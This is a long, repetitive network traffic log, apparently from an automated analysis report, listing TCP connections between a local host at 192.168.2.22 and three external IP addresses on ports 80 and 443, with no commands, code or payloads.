      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 141.98.10.88:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
      Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
      Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
